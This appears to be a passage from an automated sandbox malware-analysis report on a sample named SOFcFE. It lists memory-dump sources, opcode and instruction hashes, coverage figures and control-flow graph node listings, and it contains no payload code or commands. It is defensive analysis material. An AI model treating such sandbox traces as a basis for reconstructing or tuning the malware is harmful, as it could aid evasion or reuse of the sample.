                                                              • Instruction ID: 09d88dc56494cefbfefb2ac596a5cd08b0f6324d601ffa11829708b5e50ad083
                                                              • Opcode Fuzzy Hash: 38ffb4fdfbec57fc88230659bef638c3cc14ee51a70b438e29b48d75a23bfd2b
                                                              • Instruction Fuzzy Hash: 9911DFB5C007498FDB24DF9AD944BDEFBF4BB88324F10842AD429A7210D37AA545CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b967a900accc4d044a582bbfb144f9da0a51f4114406f20ee768361f94fc567
                                                              • Instruction ID: a7d79e5a8fb215706577c1e8c14c70dda00b9a1ed211fd1710f3440251d9f157
                                                              • Opcode Fuzzy Hash: 2b967a900accc4d044a582bbfb144f9da0a51f4114406f20ee768361f94fc567
                                                              • Instruction Fuzzy Hash: 3221F172605204DFDF18EF14D9C0B26BF75FB88324F24C569E90A0B256C37AE456CAA2
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: baebeabe85d751efb91e5524f0c1115287c6818e6e6663b645cdc89088016c10
                                                              • Instruction ID: b67dbbe7f331f950d7051fb446ff5d14a7d165d4b18a12ddeefb3c01257b1799
                                                              • Opcode Fuzzy Hash: baebeabe85d751efb91e5524f0c1115287c6818e6e6663b645cdc89088016c10
                                                              • Instruction Fuzzy Hash: 3621F272605240DFDF15EF14D9C0B26BF75FB88328F24C569E8090B256C336D856CBA6
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54cf5b8bbf3148b451bf5a6cd319859e554537b9ea824c09422a2f40744d3187
                                                              • Instruction ID: b4fb5787602a54ee608691bff0240dd74923796764e4c245c3009544655c5def
                                                              • Opcode Fuzzy Hash: 54cf5b8bbf3148b451bf5a6cd319859e554537b9ea824c09422a2f40744d3187
                                                              • Instruction Fuzzy Hash: D6210375605200DFDB14EF10D996B2ABF71FB84314F20C969D84A4B646D336D407CA65
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c4f947066bf49edb3df5f6093bfd26563e466d8f3017c05cd91dcf21c53a76a
                                                              • Instruction ID: 795726461eb8ecbfa82ba785f3b1daccfde42e31376ed9bc9d2bddf108590d6b
                                                              • Opcode Fuzzy Hash: 4c4f947066bf49edb3df5f6093bfd26563e466d8f3017c05cd91dcf21c53a76a
                                                              • Instruction Fuzzy Hash: 38212571604200DFDB04EF10D9D1B29BF71FF84314F20C96DD80A4B652C33AD806CA65
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 817a01b0ddcbc3d0aceb0b3d8b5f784d6816f72c6f769ad917f55d8d937a3dc1
                                                              • Instruction ID: a468228718993461c4938c79afb146dbf0c798e313190cc65d4a101d460e4f2d
                                                              • Opcode Fuzzy Hash: 817a01b0ddcbc3d0aceb0b3d8b5f784d6816f72c6f769ad917f55d8d937a3dc1
                                                              • Instruction Fuzzy Hash: F62180755093808FCB02DF24D591715BF71FB46214F28C5DAD8898F6A7C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction ID: a959c568870ebd62584cab2d0910b2b8a2bff28e2864900bc88d69af55730aed
                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction Fuzzy Hash: 17112676504240CFCF05DF00D5C0B16BF72FB84324F24C2A9D8090B256C33AE456CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450208082.000000000259D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0259D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_259d000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction ID: acc1b84c80b9794bb62a2c06bfea0eacff519d31a6123c8bdaa9679064aabe99
                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction Fuzzy Hash: B411E676504280CFCF15DF14D5C4B16BF72FB84328F24C6A9D8494B656C33AD856CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450350093.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_25ad000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction ID: c2de44d91bf3fe8db672dca2b09ade3178a003056b11249acd42b269e92bc011
                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction Fuzzy Hash: 8A117975504280DFCB15DF14D5D4B19BFB2FB84324F24C6A9D8494B6A6C33AD44ACB61

                                                              Execution Graph

                                                              Execution Coverage:16.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:15.2%
                                                              Total number of Nodes:33
                                                              Total number of Limit Nodes:4
                                                              execution_graph 19250 2c3e2a8 19251 2c3e2b4 19250->19251 19255 6a72962 19251->19255 19262 6a72970 19251->19262 19252 2c3e353 19256 6a72930 19255->19256 19257 6a7296a 19255->19257 19256->19252 19258 6a72a5e 19257->19258 19268 6a79b94 19257->19268 19274 6a79590 19257->19274 19278 6a797b0 19257->19278 19258->19252 19263 6a72992 19262->19263 19264 6a72a5e 19263->19264 19265 6a79b94 2 API calls 19263->19265 19266 6a797b0 2 API calls 19263->19266 19267 6a79590 LdrInitializeThunk 19263->19267 19264->19252 19265->19264 19266->19264 19267->19264 19272 6a79a4b 19268->19272 19269 6a79b8c LdrInitializeThunk 19271 6a79ce9 19269->19271 19271->19258 19272->19269 19273 6a79590 LdrInitializeThunk 19272->19273 19273->19272 19275 6a795a2 19274->19275 19277 6a795a7 19274->19277 19275->19258 19276 6a79cd1 LdrInitializeThunk 19276->19275 19277->19275 19277->19276 19282 6a797e1 19278->19282 19279 6a79941 19279->19258 19280 6a79b8c LdrInitializeThunk 19280->19279 19282->19279 19282->19280 19283 6a79590 LdrInitializeThunk 19282->19283 19283->19282 19284 6a79ed8 19285 6a79f05 19284->19285 19286 6a79590 LdrInitializeThunk 19285->19286 19287 6a7bde7 19285->19287 19289 6a7a20e 19285->19289 19286->19289 19288 6a79590 LdrInitializeThunk 19288->19289 19289->19287 19289->19288

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 974 6a797b0-6a797df 975 6a797e6-6a7987c 974->975 976 6a797e1 974->976 978 6a7991b-6a79921 975->978 976->975 979 6a79927-6a7993f 978->979 980 6a79881-6a79894 978->980 981 6a79953-6a79966 979->981 982 6a79941-6a7994e 979->982 983 6a79896 980->983 984 6a7989b-6a798ec 980->984 986 6a7996d-6a79989 981->986 987 6a79968 981->987 985 6a79ce9-6a79de6 982->985 983->984 1000 6a798ff-6a79911 984->1000 1001 6a798ee-6a798fc 984->1001 992 6a79dee-6a79df8 985->992 993 6a79de8-6a79ded 985->993 988 6a79990-6a799b4 986->988 989 6a7998b 986->989 987->986 996 6a799b6 988->996 997 6a799bb-6a799ed 988->997 989->988 993->992 996->997 1006 6a799f4-6a79a36 997->1006 1007 6a799ef 997->1007 1003 6a79913 1000->1003 1004 6a79918 1000->1004 1001->979 1003->1004 1004->978 1009 6a79a3d-6a79a46 1006->1009 1010 6a79a38 1006->1010 1007->1006 1011 6a79c6e-6a79c74 1009->1011 1010->1009 1012 6a79a4b-6a79a70 1011->1012 1013 6a79c7a-6a79c8d 1011->1013 1014 6a79a77-6a79aae 1012->1014 1015 6a79a72 1012->1015 1016 6a79c94-6a79caf 1013->1016 1017 6a79c8f 1013->1017 1025 6a79ab5-6a79ae7 1014->1025 1026 6a79ab0 1014->1026 1015->1014 1018 6a79cb6-6a79cca 1016->1018 1019 6a79cb1 1016->1019 1017->1016 1023 6a79cd1-6a79ce7 LdrInitializeThunk 1018->1023 1024 6a79ccc 1018->1024 1019->1018 1023->985 1024->1023 1028 6a79b4b-6a79b5e 1025->1028 1029 6a79ae9-6a79b0e 1025->1029 1026->1025 1032 6a79b65-6a79b8a 1028->1032 1033 6a79b60 1028->1033 1030 6a79b15-6a79b43 1029->1030 1031 6a79b10 1029->1031 1030->1028 1031->1030 1036 6a79b8c-6a79b8d 1032->1036 1037 6a79b99-6a79bd1 1032->1037 1033->1032 1036->1013 1038 6a79bd3 1037->1038 1039 6a79bd8-6a79c39 call 6a79590 1037->1039 1038->1039 1045 6a79c40-6a79c64 1039->1045 1046 6a79c3b 1039->1046 1049 6a79c66 1045->1049 1050 6a79c6b 1045->1050 1046->1045 1049->1050 1050->1011
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3774848956.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_6a70000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc71f94b70209633c447c109aabaf7f33ab05c1ac779cc6d36316a8526e8ca84
                                                              • Instruction ID: 5d74f8d6f44966fea0ae4e840b5a8ad5b50cf17974e18d33feeebd2198477b0b
                                                              • Opcode Fuzzy Hash: bc71f94b70209633c447c109aabaf7f33ab05c1ac779cc6d36316a8526e8ca84
                                                              • Instruction Fuzzy Hash: 55F1E574D00218CFEB54DFA9D884B9EFBB2BF88304F5481AAD448AB355DB31A985CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1141ce64958e2db8a69b7e45306fb423145a11f2730b37dde5e25b1bc77f6ea
                                                              • Instruction ID: 156ef327da1bd036aeea6fc0ef4d41bca74eed0e32a65009ad9a45df6140c688
                                                              • Opcode Fuzzy Hash: d1141ce64958e2db8a69b7e45306fb423145a11f2730b37dde5e25b1bc77f6ea
                                                              • Instruction Fuzzy Hash: 0B825E71A00209DFCB16CFA8C584AAEBBB2BF88314F158959E445AB365D731ED61CF60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2875 2c369a0-2c369e6 2876 2c36fb1-2c3700c call 2c37118 2875->2876 2877 2c369ec-2c369fa 2875->2877 2889 2c3700e-2c37012 2876->2889 2890 2c3705c-2c37060 2876->2890 2880 2c36a28-2c36a39 2877->2880 2881 2c369fc-2c36a0d 2877->2881 2883 2c36a3b-2c36a3f 2880->2883 2884 2c36aaa-2c36abe 2880->2884 2881->2880 2891 2c36a0f-2c36a1b 2881->2891 2886 2c36a41-2c36a4d 2883->2886 2887 2c36a5a-2c36a63 2883->2887 3019 2c36ac1 call 2c369a0 2884->3019 3020 2c36ac1 call 2c36fc8 2884->3020 2893 2c36a53-2c36a55 2886->2893 2894 2c36ddb-2c36e26 2886->2894 2895 2c36a69-2c36a6c 2887->2895 2896 2c36d6c 2887->2896 2898 2c37021-2c37028 2889->2898 2899 2c37014-2c37019 2889->2899 2900 2c37062-2c37071 2890->2900 2901 2c37077-2c3708b 2890->2901 2902 2c36d71-2c36dd4 2891->2902 2903 2c36a21-2c36a23 2891->2903 2892 2c36ac7-2c36acd 2904 2c36ad6-2c36add 2892->2904 2905 2c36acf-2c36ad1 2892->2905 2906 2c36d62-2c36d69 2893->2906 2973 2c36e2d-2c36eac 2894->2973 2895->2896 2897 2c36a72-2c36a91 2895->2897 2896->2902 2897->2896 2936 2c36a97-2c36a9d 2897->2936 2910 2c370fe-2c37113 2898->2910 2911 2c3702e-2c37035 2898->2911 2899->2898 2907 2c37073-2c37075 2900->2907 2908 2c3709d-2c370a7 2900->2908 2912 2c37093-2c3709a 2901->2912 3021 2c3708d call 2c39dd0 2901->3021 3022 2c3708d call 2c3a0e8 2901->3022 3023 2c3708d call 2c3a088 2901->3023 2902->2894 2903->2906 2913 2c36ae3-2c36afa 2904->2913 2914 2c36bcb-2c36bdc 2904->2914 2905->2906 2907->2912 2918 2c370b1-2c370b5 2908->2918 2919 2c370a9-2c370af 2908->2919 2911->2890 2917 2c37037-2c3703b 2911->2917 2913->2914 2933 2c36b00-2c36b0c 2913->2933 2930 2c36c06-2c36c0c 2914->2930 2931 2c36bde-2c36beb 2914->2931 2922 2c3704a-2c37051 2917->2922 2923 2c3703d-2c37042 2917->2923 2924 2c370bd-2c370f7 2918->2924 2926 2c370b7 2918->2926 2919->2924 2922->2910 2932 2c37057-2c3705a 2922->2932 2923->2922 2924->2910 2926->2924 2938 2c36c27-2c36c2d 2930->2938 2939 2c36c0e-2c36c1a 2930->2939 2931->2938 2950 2c36bed-2c36bf9 2931->2950 2932->2912 2934 2c36b12-2c36b7e 2933->2934 2935 2c36bc4-2c36bc6 2933->2935 2975 2c36b80-2c36baa 2934->2975 2976 2c36bac-2c36bc1 2934->2976 2935->2906 2936->2876 2942 2c36aa3-2c36aa7 2936->2942 2946 2c36c33-2c36c50 2938->2946 2947 2c36d5f 2938->2947 2944 2c36ec3-2c36f26 2939->2944 2945 2c36c20-2c36c22 2939->2945 2942->2884 2999 2c36f2d-2c36fac 2944->2999 2945->2906 2946->2896 2965 2c36c56-2c36c59 2946->2965 2947->2906 2955 2c36eb1-2c36ebc 2950->2955 2956 2c36bff-2c36c01 2950->2956 2955->2944 2956->2906 2965->2876 2968 2c36c5f-2c36c85 2965->2968 2968->2947 2980 2c36c8b-2c36c97 2968->2980 2975->2976 2976->2935 2982 2c36d5b-2c36d5d 2980->2982 2983 2c36c9d-2c36d15 2980->2983 2982->2906 3000 2c36d43-2c36d58 2983->3000 3001 2c36d17-2c36d41 2983->3001 3000->2982 3001->3000 3019->2892 3020->2892 3021->2912 3022->2912 3023->2912
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60feebd4bd681d52c1252a3f5c87df3517b34b36f3bb9257ce60ebe1d5c694ea
                                                              • Instruction ID: 148b87cd31a8a1ba69fdc9b76694ea58c0a6371b93c2e9ebe83ecacf31ca39f4
                                                              • Opcode Fuzzy Hash: 60feebd4bd681d52c1252a3f5c87df3517b34b36f3bb9257ce60ebe1d5c694ea
                                                              • Instruction Fuzzy Hash: 41127D70A002199FDB15DF69C854BAEBBF6FF88304F208929E406EB355DB359D42CB94

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3281 2c37118-2c3713b 3282 2c37146-2c37166 3281->3282 3283 2c3713d-2c37143 3281->3283 3286 2c37168 3282->3286 3287 2c3716d-2c37174 3282->3287 3283->3282 3288 2c374fc-2c37505 3286->3288 3289 2c37176-2c37181 3287->3289 3290 2c37187-2c3719a 3289->3290 3291 2c3750d-2c37519 3289->3291 3296 2c371b0-2c371cb 3290->3296 3297 2c3719c-2c371aa 3290->3297 3294 2c3751b-2c37521 3291->3294 3295 2c374de-2c374e0 3291->3295 3298 2c37523-2c37549 3294->3298 3299 2c374e6-2c374e9 3294->3299 3300 2c374e2-2c374e4 3295->3300 3301 2c374b6-2c374b9 3295->3301 3309 2c371ef-2c371f2 3296->3309 3310 2c371cd-2c371d3 3296->3310 3297->3296 3307 2c37484-2c3748b 3297->3307 3314 2c37552-2c37556 3298->3314 3315 2c3754b-2c37550 3298->3315 3311 2c374f0-2c374f3 3299->3311 3300->3299 3304 2c37508 3300->3304 3301->3304 3305 2c374bb-2c374c0 3301->3305 3304->3291 3305->3300 3306 2c374c2-2c374c4 3305->3306 3312 2c374d3-2c374d9 3306->3312 3313 2c374c6-2c374cb 3306->3313 3307->3288 3318 2c3748d-2c3748f 3307->3318 3320 2c371f8-2c371fb 3309->3320 3321 2c3734c-2c37352 3309->3321 3316 2c371d5 3310->3316 3317 2c371dc-2c371df 3310->3317 3311->3304 3319 2c374f5-2c374fa 3311->3319 3312->3291 3322 2c374db 3312->3322 3313->3312 3323 2c3755c-2c3755d 3314->3323 3315->3323 3316->3317 3316->3321 3324 2c37212-2c37218 3316->3324 3325 2c3743e-2c37441 3316->3325 3317->3324 3326 2c371e1-2c371e4 3317->3326 3327 2c37491-2c37496 3318->3327 3328 2c3749e-2c374a4 3318->3328 3319->3288 3319->3318 3320->3321 3330 2c37201-2c37207 3320->3330 3321->3325 3329 2c37358-2c3735d 3321->3329 3322->3295 3335 2c3721a-2c3721c 3324->3335 3336 2c3721e-2c37220 3324->3336 3325->3304 3337 2c37447-2c3744d 3325->3337 3331 2c371ea 3326->3331 3332 2c3727e-2c37284 3326->3332 3327->3328 3328->3291 3333 2c374a6-2c374ab 3328->3333 3329->3325 3330->3321 3334 2c3720d 3330->3334 3331->3325 3332->3325 3342 2c3728a-2c37290 3332->3342 3333->3311 3341 2c374ad-2c374b2 3333->3341 3334->3325 3338 2c3722a-2c37233 3335->3338 3336->3338 3339 2c37472-2c37476 3337->3339 3340 2c3744f-2c37457 3337->3340 3346 2c37246-2c3726e 3338->3346 3347 2c37235-2c37240 3338->3347 3339->3307 3348 2c37478-2c3747e 3339->3348 3340->3291 3345 2c3745d-2c3746c 3340->3345 3341->3304 3349 2c374b4 3341->3349 3343 2c37292-2c37294 3342->3343 3344 2c37296-2c37298 3342->3344 3350 2c372a2-2c372b9 3343->3350 3344->3350 3345->3296 3345->3339 3361 2c37362-2c37398 3346->3361 3362 2c37274-2c37279 3346->3362 3347->3325 3347->3346 3348->3289 3348->3307 3349->3305 3355 2c372e4-2c3730b 3350->3355 3356 2c372bb-2c372d4 3350->3356 3355->3304 3365 2c37311-2c37314 3355->3365 3356->3361 3366 2c372da-2c372df 3356->3366 3369 2c373a5-2c373ad 3361->3369 3370 2c3739a-2c3739e 3361->3370 3362->3361 3365->3304 3368 2c3731a-2c37343 3365->3368 3366->3361 3368->3361 3385 2c37345-2c3734a 3368->3385 3369->3304 3373 2c373b3-2c373b8 3369->3373 3371 2c373a0-2c373a3 3370->3371 3372 2c373bd-2c373c1 3370->3372 3371->3369 3371->3372 3374 2c373c3-2c373c9 3372->3374 3375 2c373e0-2c373e4 3372->3375 3373->3325 3374->3375 3377 2c373cb-2c373d3 3374->3377 3378 2c373e6-2c373ec 3375->3378 3379 2c373ee-2c3740d call 2c376f1 3375->3379 3377->3304 3380 2c373d9-2c373de 3377->3380 3378->3379 3382 2c37413-2c37417 3378->3382 3379->3382 3380->3325 3382->3325 3383 2c37419-2c37435 3382->3383 3383->3325 3385->3361
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e7e1770056114a1380156de80e3549fa6ca186bb9f3e373afbaaae16f27c2a3
                                                              • Instruction ID: 9cd153d4f1b1e9b336b341464dfa9ef23901212f45aaa5810f22042effca703f
                                                              • Opcode Fuzzy Hash: 6e7e1770056114a1380156de80e3549fa6ca186bb9f3e373afbaaae16f27c2a3
                                                              • Instruction Fuzzy Hash: 5AE128B1A00119DFCB16CFA9C884AADFBB2BF88314F158869E805AB365D731ED55CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1dc105916a3f64ceda133ae83353186a00b06b8d7efe21a05e7faccf4c789fbb
                                                              • Instruction ID: 7023ee5c2e2f6b70a88f529f4c90b66b1ba304c6937cd99c9e8bbc2aa6436bc9
                                                              • Opcode Fuzzy Hash: 1dc105916a3f64ceda133ae83353186a00b06b8d7efe21a05e7faccf4c789fbb
                                                              • Instruction Fuzzy Hash: 49A1F675E00218DFDB15DFAAD884A9DBBF2BF89300F14846AE409BB365DB319941CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e389dd174ac4df8bd84955e834dc12fb53df12d2599e6690bbf78a91c61ebbb
                                                              • Instruction ID: 740358763760dd2b959e702c45d0f08221bafe85b64a62d5b5144783d6f3ca5e
                                                              • Opcode Fuzzy Hash: 6e389dd174ac4df8bd84955e834dc12fb53df12d2599e6690bbf78a91c61ebbb
                                                              • Instruction Fuzzy Hash: 3C91D475E00218DFDB19DFA9D984A9DBBF2FF88300F5484AAD809AB365DB309945CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d0995bc6cb778367906cf26878502e49e4f6a1baa7144cd02ab736e9b050fea
                                                              • Instruction ID: 94d71aeae62c5147303849b94f63cb32494f14093f00ac75126b21a2b4ae0733
                                                              • Opcode Fuzzy Hash: 4d0995bc6cb778367906cf26878502e49e4f6a1baa7144cd02ab736e9b050fea
                                                              • Instruction Fuzzy Hash: 5581A374E00218DFEB15DFAAD984A9DBBF2BF88300F14946AD819BB365DB305941CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 735c8c7e2c860d15244237b0d5614f3ca5589cec12c02276592faa2381207a29
                                                              • Instruction ID: d2955c0c58c5d13afdeec2cf07aa4ee9956626d475985801faad347ce480c79b
                                                              • Opcode Fuzzy Hash: 735c8c7e2c860d15244237b0d5614f3ca5589cec12c02276592faa2381207a29
                                                              • Instruction Fuzzy Hash: B281A474E00618DFDB15DFAAD984A9DBBF2BF88304F14846AD819BB365DB309941CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a184c8361717e24b2f3bdc31243eaebe00a9f2d0d6246a7c7b08b8975c8f2f90
                                                              • Instruction ID: 0d44c1ed7a2557cfd9990627f97ce8be3650c9908a3604fd28b3afe04200d7e7
                                                              • Opcode Fuzzy Hash: a184c8361717e24b2f3bdc31243eaebe00a9f2d0d6246a7c7b08b8975c8f2f90
                                                              • Instruction Fuzzy Hash: 8481C774E00218CFDB19DFAAD984A9DBBF2BF88310F148469E419AB365DB309941CF51
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82b7ef60873f3ee0239241e476ede0f0099c4d46a1a6c63d54eaf1df7f9e45b2
                                                              • Instruction ID: 89a0862a58dd294255aa19a19d14fca647b01412535c67dbd2e57a9ed29d865b
                                                              • Opcode Fuzzy Hash: 82b7ef60873f3ee0239241e476ede0f0099c4d46a1a6c63d54eaf1df7f9e45b2
                                                              • Instruction Fuzzy Hash: AB819274E00218DFEB15DFAAD984B9DBBF2BF88300F14846AE819AB355DB305A41CF51
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 906207956e6df6692b10efff22ad9fd9787504d06ba68993d3c108d3dfa3b9ee
                                                              • Instruction ID: ab0868a0302518035aadc4cf72895b63ad556696ad23e177ab47c9c7fde07185
                                                              • Opcode Fuzzy Hash: 906207956e6df6692b10efff22ad9fd9787504d06ba68993d3c108d3dfa3b9ee
                                                              • Instruction Fuzzy Hash: 4B81A374E00258DFEB14DFAAD984A9DBBF2BF88300F14846AE419BB365DB309941CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ecbc6bd6cde37dbd225036e73f460305c1f709429385b55845de158581974e36
                                                              • Instruction ID: 29dfcce03ec6e4f064f6d9473f7306d56063e4a57ef384c8f5404d4f5a8231e0
                                                              • Opcode Fuzzy Hash: ecbc6bd6cde37dbd225036e73f460305c1f709429385b55845de158581974e36
                                                              • Instruction Fuzzy Hash: 5D81B374E00218DFEB15DFAAD984A9DBBF2BF88310F14C469E819AB365DB309945CF50
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3768369ea9499bc810764c13eb7c3de4d65dee1c589afc62333a40899e8e8b02
                                                              • Instruction ID: 35f1304b182eecee5375f16161c108b3f587cb7ee4317d72035673ca44f009c0
                                                              • Opcode Fuzzy Hash: 3768369ea9499bc810764c13eb7c3de4d65dee1c589afc62333a40899e8e8b02
                                                              • Instruction Fuzzy Hash: AD51A574E00308DFEB19DFAAD594A9DBBB2FF89300F248429E815AB364DB315942CF54
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.3762821748.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_2c30000_SOFcFE.jbxd
                                                              Similarity
